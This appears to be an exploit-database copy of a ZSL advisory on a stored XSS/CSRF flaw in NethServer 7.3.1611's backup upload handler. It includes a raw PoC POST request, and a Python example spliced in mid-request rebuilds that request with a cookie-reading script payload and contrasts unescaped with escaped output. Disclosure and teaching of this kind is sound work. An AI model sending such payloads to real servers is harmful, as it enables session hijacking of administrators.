NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting Vulnerabilities

ID 1337DAY-ID-28388
Type zdt
Reporter LiquidWorm
Modified 2017-08-29T00:00:00


Exploit for jsp platform in category web applications

NethServer 7.3.1611 (Upload.json) CSRF Script Insertion Vulnerability
Product web page:
Affected version: 7.3.1611-u1-x86_64
Summary: NethServer is an operating system for the Linux enthusiast,
designed for small offices and medium enterprises. It's simple, secure
and flexible.
Desc: NethServer suffers from an authenticated stored XSS vulnerability.
Input passed to the 'BackupConfig[Upload][Description]' POST parameter of the
configuration-backup upload handler (/en-US/BackupConfig/Upload.json) is not
properly sanitised before being stored and later returned to the user. This can
be exploited to execute arbitrary HTML and script code in a user's browser
session in the context of the affected site.
Tested on: Kernel 3.10.0-514.el7.x86_64 on an x86_64
           CentOS Linux 7.3.1611 (Core)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Advisory ID: ZSL-2017-5432
Advisory URL:
PoC request:
POST /en-US/BackupConfig/Upload.json HTTP/1.1
Connection: close
Content-Length: 15762
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8FfEu2Tn6fUOnT80
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: nethgui=4igflab8fmbi5aq26pvsp5r0f2

------WebKitFormBoundary8FfEu2Tn6fUOnT80
Content-Disposition: form-data; name="arc"; filename="backup-config.7z.xz"
Content-Type: application/x-xz

[xz content omitted]
------WebKitFormBoundary8FfEu2Tn6fUOnT80
Content-Disposition: form-data; name="BackupConfig[Upload][Description]"

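The following is an added worked example, not part of the ZSL advisory and not NethServer/Nethgui code. It rebuilds the multipart body of the PoC request above (same boundary, same two form parts, same field names), parses it back the way a server-side form handler would, and then contrasts the bug class the advisory describes (the stored Description value echoed into HTML unchanged) with a context-correct fix (HTML-escaping it on output). The archive bytes and the script payload are constructed sample values; the advisory omits both.

```python
"""Added example: reconstruct the advisory's multipart PoC body and show why
unescaped output of the Description field is exploitable. Not from the
advisory or from NethServer; sample values below are constructed."""
import html
from email import policy
from email.parser import BytesParser

# Boundary and field names exactly as they appear in the advisory's PoC request.
BOUNDARY = "----WebKitFormBoundary8FfEu2Tn6fUOnT80"
DESC_FIELD = "BackupConfig[Upload][Description]"

# Constructed sample values (the advisory shows neither the xz bytes nor the payload).
SAMPLE_ARCHIVE = b"XZ-ARCHIVE-BYTES-PLACEHOLDER"      # stands in for the real .xz content
SAMPLE_PAYLOAD = "<script>alert(document.cookie)</script>"  # sample stored-XSS payload


def build_multipart(archive: bytes, description: str, boundary: str = BOUNDARY) -> bytes:
    """Assemble the two-part body laid out as in the PoC: the archive part, then
    the Description part, then the closing delimiter."""
    crlf = b"\r\n"
    delim = b"--" + boundary.encode()
    archive_part = (
        delim + crlf
        + b'Content-Disposition: form-data; name="arc"; filename="backup-config.7z.xz"' + crlf
        + b"Content-Type: application/x-xz" + crlf
        + crlf + archive
    )
    desc_part = (
        delim + crlf
        + ('Content-Disposition: form-data; name="%s"' % DESC_FIELD).encode() + crlf
        + crlf + description.encode("utf-8")
    )
    return archive_part + crlf + desc_part + crlf + delim + b"--" + crlf


def parse_multipart(body: bytes, boundary: str = BOUNDARY) -> dict:
    """Parse the body back into {field name: value} with the stdlib MIME parser,
    as a server would: file parts stay bytes, plain fields are decoded text."""
    header = ("Content-Type: multipart/form-data; boundary=%s\r\n\r\n" % boundary).encode()
    msg = BytesParser(policy=policy.default).parsebytes(header + body)
    fields = {}
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        payload = part.get_payload(decode=True)
        fields[name] = payload if part.get_filename() else payload.decode("utf-8")
    return fields


def render_vulnerable(description: str) -> str:
    """The bug class in the advisory: the stored value is echoed into the page as-is."""
    return '<td class="description">%s</td>' % description


def render_escaped(description: str) -> str:
    """Fix for HTML element content: encode &, <, >, and quotes on output.
    (Attribute, URL and JavaScript contexts need their own encoders.)"""
    return '<td class="description">%s</td>' % html.escape(description, quote=True)


def demo() -> dict:
    """Round-trip the sample request and render the field both ways."""
    body = build_multipart(SAMPLE_ARCHIVE, SAMPLE_PAYLOAD)
    desc = parse_multipart(body)[DESC_FIELD]
    return {
        "stored": desc,
        "vulnerable_html": render_vulnerable(desc),
        "escaped_html": render_escaped(desc),
        "vulnerable_has_script_tag": "<script>" in render_vulnerable(desc),
        "escaped_has_script_tag": "<script>" in render_escaped(desc),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-26s %r" % (key, value))
```

The escaped rendering keeps the description readable to the user while neutralising the markup; the unescaped one is exactly what lets the stored value run as script in the session of whoever views the backup list.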
# [2018-04-03]  #